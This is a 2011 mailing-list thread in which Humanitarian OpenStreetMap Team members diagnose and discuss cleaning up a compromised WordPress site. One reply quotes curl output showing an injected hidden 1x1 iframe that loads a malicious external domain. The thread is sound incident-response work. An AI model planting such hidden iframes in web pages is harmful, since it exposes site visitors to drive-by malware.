[HOT] Malware on hot.openstreetmap.org

Kate Chapman kate at maploser.com
Mon Oct 24 07:37:46 BST 2011


Unfortunately there does not appear to be a way I can fix this without
having access to the actual server.

Any suggestions?  My though is to back-up the blog posts and move it
to another wordpress instance.  That way then we could switch the DNS
to the new server.

-Kate

On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville
<rodolphe at quiedeville.org> wrote:
> Le 24/10/2011 08:28, Kate Chapman a écrit :
>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
>> missing something.
>
> The iframe is not on the /weblog/ pages you can see it when you call the
> root url like this :
>
>
> rodo at elz:~$ curl hot.openstreetmap.org
> <html>
> <head>
> <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
> </head>
> <body><iframe
> src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
> width="1" height="1"></iframe>
> <script type="text/javascript">
> var gaJsHost = (("https:" == document.location.protocol) ?
> "https://ssl." : "http://www.");
> document.write(unescape("%3Cscript src='" + gaJsHost +
> "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
> </script>
> <script type="text/javascript">
> var pageTracker = _gat._getTracker("UA-5963453-1");
> pageTracker._trackPageview();
> </script>
> </body>
> </html>
>
> Have a look at the beginning of body part
>
> It's probably not in the theme part of Wordpress, but somewhere in the
> config parts of the blog.
>
> Regards
>
>
>
>>
>> -Kate
>>
>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
>> <rodolphe at quiedeville.org> wrote:
>>> Hi,
>>>
>>> Someone cracked the Wordpress installed on hot.openstreetmap.org and add
>>> an iframe to :
>>>
>>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>>
>>> Edit the wordpresss template, remove this iframe and it could resolve
>>> the problem. The security alert occurs on Firefox too.
>>>
>>> Regards
>>>
>>>
>>> Le 23/10/2011 23:33, Kate Chapman a écrit :
>>>> Hi Floris,
>>>>
>>>> Yes, I know about the problem but haven't been able to fix it.  I think
>>>> logging into the server might be necessary, but I think only Mikel has
>>>> access.
>>>>
>>>> If anyone has other suggestions please help.
>>>>
>>>> Kate
>>>>
>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu
>>>> <mailto:osm at floris.nu>> wrote:
>>>>
>>>>     I'm getting warnings from Chrome at the moment that
>>>>     hot.openstreetmap.org <http://hot.openstreetmap.org> is infected
>>>>     with malware.
>>>>
>>>>     Anybody want to look into that?
>>>>
>>>>     Here's the google diagnose page for it:
>>>>
>>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>>     <http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en>
>>>>
>>>>     Greetings,
>>>>     Floris Looijesteijn
>>>>
>>>>     (tracing Van, Turkey)
>>>>
>>>>     _______________________________________________
>>>>     HOT mailing list
>>>>     HOT at openstreetmap.org <mailto:HOT at openstreetmap.org>
>>>>     http://lists.openstreetmap.org/listinfo/hot
>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> HOT mailing list
>>>> HOT at openstreetmap.org
>>>> http://lists.openstreetmap.org/listinfo/hot
>>>
>>>
>>> --
>>> Rodolphe Quiédeville
>>> http://cartosm.eu - Intégration de carte libre sur site web
>>> Blog : http://blog.rodolphe.quiedeville.org/
>>> SIP/XMPP : rodolphe at quiedeville.org
>>>
>>> _______________________________________________
>>> HOT mailing list
>>> HOT at openstreetmap.org
>>> http://lists.openstreetmap.org/listinfo/hot
>>>
>
>
> --
> Rodolphe Quiédeville
> http://cartosm.eu - Intégration de carte libre sur site web
> Blog : http://blog.rodolphe.quiedeville.org/
> SIP/XMPP : rodolphe at quiedeville.org
>



More information about the HOT mailing list